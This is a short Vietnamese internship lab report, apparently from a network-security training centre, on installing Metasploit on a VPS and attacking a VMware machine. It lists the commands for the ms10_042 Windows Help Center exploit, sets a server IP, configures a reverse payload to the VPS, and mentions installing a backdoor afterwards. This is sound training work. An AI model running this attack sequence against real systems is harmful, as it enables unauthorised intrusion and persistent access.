Báo cáo về thực hiện t tấn công qua mạng internet từ VPS đến mấy VMWare.

1. TRUNG TÂM ĐÀO TẠO QUẢNG TRỊ MẠNG VÀ AN
NINH MẠNG QUỐC TẾ ATHENA
Báo Cáo Tuần 4&5&6
Chủ đề: Nghiên Cứu về các chức năng của backtrack để
kiểm tra an lổ hổng ninh mạng.
Giáo viên hướng dẫn: Thầy Võ Đỗ Thắng
Thực tập viên: Đỗ Liên Hán
Công việc trong tuần là :
 Đăng ký VPS tại athena.
 Tải về và cài đặt Metasploit trên VPS.
 Thực hiện tấn công từ VPS xuống máy VMWare.

2. I. Cài đặt metasploit

3. Tắt các chương trình anti virus và tường lửa (Firewall) để đảm bảo chương trình
chạy tốt.

4. Cài đặt cổng SSL để metasploit sử dụng khi chạy.

5. Chờ cho quá trình giải nén các tập tin cài đặt cơ sở dữ liệu hoàn tất là được.

6. II. Thực hiện tấn công từ VPS:
Dùng lệnh search ms10_042 để tìm module phù hợp.
Dùng lệnh use
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec
Dùng lệnh show options để xem các điều kiện cần bổ sung.

7. Lệnh set srvhost 14.0.31.166 để xác định địa chỉ của server phát tán mã.
Tạo payload để thành mục tiêu trả về cho VPS.
Tạo địa chỉ local host cho payload.
Sau đó bắt đầu exploit lỗi.

8. Sau khi kết nối thành công có thể dung những lệnh khác để thực hiện việc
thu thập thông tin hoặc cài đặt cửa sau.